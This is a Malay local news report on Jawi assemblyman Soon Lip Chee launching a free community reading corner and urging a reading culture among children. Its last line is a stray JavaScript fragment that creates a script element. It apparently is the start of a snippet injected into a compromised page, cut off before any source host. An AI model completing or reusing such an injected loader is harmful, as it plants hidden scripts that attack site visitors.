ADUN tubuh Sudut Ilmu percuma semai budaya membaca

JAWI – Ahli Dewan Undangan Negeri (ADUN) Jawi, Soon Lip Chee percaya bahawa budaya membaca harus disemai sejak dari kecil lagi dan terus dipupuk sepanjang masa tanpa mengira latar belakang pendidikan seseorang.

Jelasnya, pembacaan bukan sahaja mampu merangsang minda terutamanya dalam kalangan kanakkanak, tetapi juga menjadi medium pembangunan insaniah secara menyeluruh.

“Melalui pembacaan, kanak-kanak dapat mengenali dunia dan mewujudkan budaya ilmiah yang sihat,” katanya pada Majlis Perasmian Sudut Ilmu di Dewan Jawatankuasa Kemajuan dan Keselamatan Komuniti (JKKK) Taman Bistari di sini baru-baru ini.

Inisiatif penubuhan Sudut Ilmu adalah daripada beliau sendiri bersama-sama ahli JKKK Jalan Byram.

Selain menyediakan bahan bacaan dalam pelbagai bahasa secara percuma, Sudut Ilmu turut menyediakan buku-buku ulang kaji bagi pelajar yang bakal menduduki peperiksaan umum.

Mengulas lanjut, Lip Chee memberitahu bahawa ibu bapa perlu memainkan peranan mendorong anak-anak masingmasing untuk meminati aktiviti membaca dan menjadikan ia sebagai sebahagian daripada hobi.

Sudut Ilmu dibuka setiap hari kecuali Ahad bermula jam 8 pagi hingga 5 petang.

var d=document;var s=d.createElement(‘script’);